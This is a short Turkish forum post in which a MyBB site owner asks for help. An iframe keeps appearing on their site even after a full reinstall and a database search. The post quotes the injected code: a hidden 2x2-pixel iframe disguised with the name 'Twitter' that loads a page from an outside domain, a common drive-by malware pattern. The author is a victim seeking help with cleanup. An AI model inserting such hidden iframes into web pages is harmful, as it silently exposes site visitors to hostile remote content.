Site mybb bir forum sitesidir. Olayı kısaca şöyle anlatayim; FTP den tüm dosyaları komple silip yeniden en son sürüm mybb kurdum. Ancak hala iframe gözüküyor. SQL den arama yaptım yine bulamadım. Nereye eklenmiş bir türlü bulamadım. Bu konuda bana yardımcı olabilir misiniz?
Eklenen kod:
<iframe width="2" scrolling="auto" height="2" frameborder="no" align="middle" src="http://hecodat.de/zwmd.html?j=1501968" name="Twitter"></iframe>